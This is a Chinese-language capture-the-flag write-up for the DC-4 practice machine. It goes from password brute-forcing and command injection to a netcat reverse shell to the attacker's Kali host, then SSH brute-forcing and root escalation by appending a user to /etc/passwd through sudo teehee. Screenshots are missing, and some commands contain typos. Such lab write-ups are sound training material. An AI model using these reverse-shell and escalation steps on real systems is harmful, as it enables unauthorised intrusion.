DC-4的渗透
靶机需要在与kali机在同一网段下:
桌面
一个linux的界面,还是登录界面,那就是获得root权限喽
那还等什么,开始!
第一步——信息收集
1.kali的ip:192.168.13.128
2.靶机的ip:192.168.13.132
3.扫描靶机ip获得其端口信息:
两个端口,一个是80/http一个是22端口的ssh
4.搜索靶机的域名信息:http://192.168.13.132
5.搜索靶机的域名信息:
6.登录该网址:
是一个登录系统,而且还自动跳出了一个用户命,那么现在就只需要获得密码就可以了
7.获得密码本:
获得了密码本
8.爆破密码(使用burp抓包):
设置一个爆破点就行:
添加密码本:
只爆破一个地方,开始爆破,经过几分钟的等待:
爆破结果最长的就是密码:happy
很好现在进行的信息收集已经到达了一个阶段
成果:
kali的ip:192.168.13.128
靶机的ip:192.168.13.132
靶机的域名:http://192.168.13.132
靶机的域名信息
登录网站的密码以及用户名admin/happy
开始第二步——网站的漏洞查找
1.登录上去,就怎么多:
2.点击command,并且点击run:
难道是命令执行漏洞,赶紧抓包
3.抓包:
可能猜想的没错,将其连接到本机端口进行监听
4.监听,开启伪终端:nc -e /bin/bash 192.168.13.128 4444
5.本机监听:
监听成功,开启伪代码进行交互
6.交互:python -c 'import pty;pty.spwan("/bin/bash")'
交互成功,但是并不是root
7.查看家目录:发现三个用户:charles jim sam
但是只有jim可以进入
8.查看jim的文件信息:、
发现了一个
查看它:
有一个密码本,将其copy到桌面,命名为jim.txt:
现在获得了jim的密码本,因为还有一个ssh端口没有用那么
可以进行一个jim用户的爆破:
爆破成功,过程需要等一小会
9.登录它:
登陆上去了
10.查看其权限:
普通用户没有其root权限
看一下它的文件:存在一个mbox,查看它:
是root给jim写的emil
11.查看一下jim的邮件信息:/var/spool/mail
是<charles@dc-4>的一封信,而且还有他的密码那就登录上去吧:
12.登录charles:
登录上去了
看一下他的权限:
看到teehee具有root权限,看来是需要teehee来提权
13.查阅资料得知:
teehee命令可以对文件进行写入操作。
我们可以使用teehee来改写passed的内容添加一个root用户:添加-a可选项
14.提权:sudo teeheee -a /etc/passwd
查看一下是否写入:
最后方可以看到已经写进去了
15.登录我们创建的用户我也不知道为啥我登录不上去了,这个是我第二次做第一次做的时候是可以登录上去的
我尝试了好几次:
可以看到用户是被创建上去了的,但是不知道为什么要密码了,
登录上去后在使用whoami就是root用户,在/root下就是flag,也可以使用find /-name *flag*来找flag的位置
我看了别人的wp也是这样做的,我第一次也是这样做的,当时是不需要密码的,而且在创建的时候就没有创建密码
也不知道为什么!!!!
当我想要放弃的时候,我想到了重启
没想到:
登录上去了
太棒了! xiao和xiaoli都是一样的
赶紧打开root下的文件:
找到啦!!!!:
成功!!!!!!
备注: